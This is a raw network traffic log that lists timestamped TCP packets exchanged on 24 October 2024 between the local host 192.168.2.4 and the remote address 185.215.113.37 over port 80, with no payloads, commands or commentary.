Oct 24, 2024 19:29:17.531765938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531775951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531793118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531810999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531873941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531889915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531903982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531919003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531920910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531929016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531934977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531949997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531950951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531966925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.531969070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.531980038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532006025 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532026052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532109022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532124996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532141924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532150984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532157898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532160044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532174110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532179117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532190084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532200098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532206059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532208920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532233953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532248020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532285929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532300949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532315016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532326937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532331944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532341003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532362938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532372952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532394886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532439947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532485008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532499075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532514095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532520056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532530069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532541037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532546997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532552958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532563925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532574892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532582045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532583952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532607079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532628059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532655001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532691956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532742977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532757998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532772064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532782078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532787085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532800913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532802105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532814980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532819986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532833099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532835960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532844067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532871008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532881021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532885075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532898903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532922029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532926083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532943010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532948017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532959938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532965899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532974958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532975912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.532990932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.532996893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533009052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533010006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533030987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533040047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533217907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533233881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533250093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533262014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533267021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533283949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533294916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533294916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533318996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533337116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533401012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533416033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533430099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533442020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533454895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533463001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533478022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533483028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533494949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533499956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533510923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533519983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533529997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533530951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533550978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533561945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533621073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533636093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533663034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533674002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533761978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533778906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533792019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533801079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533807039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533823013 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533823013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533833027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533838987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533853054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533859015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533866882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533878088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533886909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533895016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533902884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533911943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533914089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533943892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533943892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533958912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533963919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533978939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.533983946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533992052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.533994913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534012079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534018040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.534029007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.534050941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.534066916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534081936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534096956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534106970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.534111977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.534133911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.534169912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575387955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575407982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575438023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575444937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575454950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575465918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575473070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575478077 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575489998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.575500011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575512886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.575534105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649796963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649836063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649852037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649868011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649866104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649882078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649885893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649903059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649919987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649924040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649945974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649966002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.649983883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.649998903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650013924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650023937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650029898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650038958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650044918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650058985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650060892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650073051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650078058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650091887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650094032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:17.650100946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650120974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.650147915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.732657909 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:17.738320112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016415119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016449928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016464949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016493082 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.016526937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.016556025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016571999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016586065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016603947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.016613007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.016623020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.016650915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017101049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017117977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017132044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017147064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017163992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017194033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017209053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017224073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017239094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017241955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017255068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017266989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017292023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017364025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017379045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017395020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017401934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017410994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017426014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017427921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017437935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017442942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017458916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017461061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017472982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017489910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017493963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017518997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017545938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017795086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017829895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017860889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017867088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017869949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017884970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017900944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017930984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017946005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017959118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017960072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017959118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017976999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.017983913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.017992973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018007040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018007994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018023968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018038988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018039942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018065929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018066883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018084049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018085003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018100023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018110991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018116951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018121958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018131971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018142939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018156052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018177032 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018224001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018239975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018254995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018270016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018277884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018285036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018301964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018304110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018316984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018328905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018333912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018349886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018357992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018367052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.018384933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.018409014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133698940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133729935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133747101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133774996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133773088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133790970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133804083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133806944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133822918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133837938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133848906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133848906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133857012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133872986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133881092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133903980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133905888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133927107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133933067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133944035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133950949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133963108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.133965015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133985996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.133995056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134006977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134011984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134027004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134035110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134044886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134056091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134073973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134079933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134088993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134103060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134119034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134125948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134134054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134149075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134149075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134160995 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134177923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134197950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:18.134268045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134283066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134296894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:18.134310007 CEST	49730	80	192.168.2.4	185.215.113.37
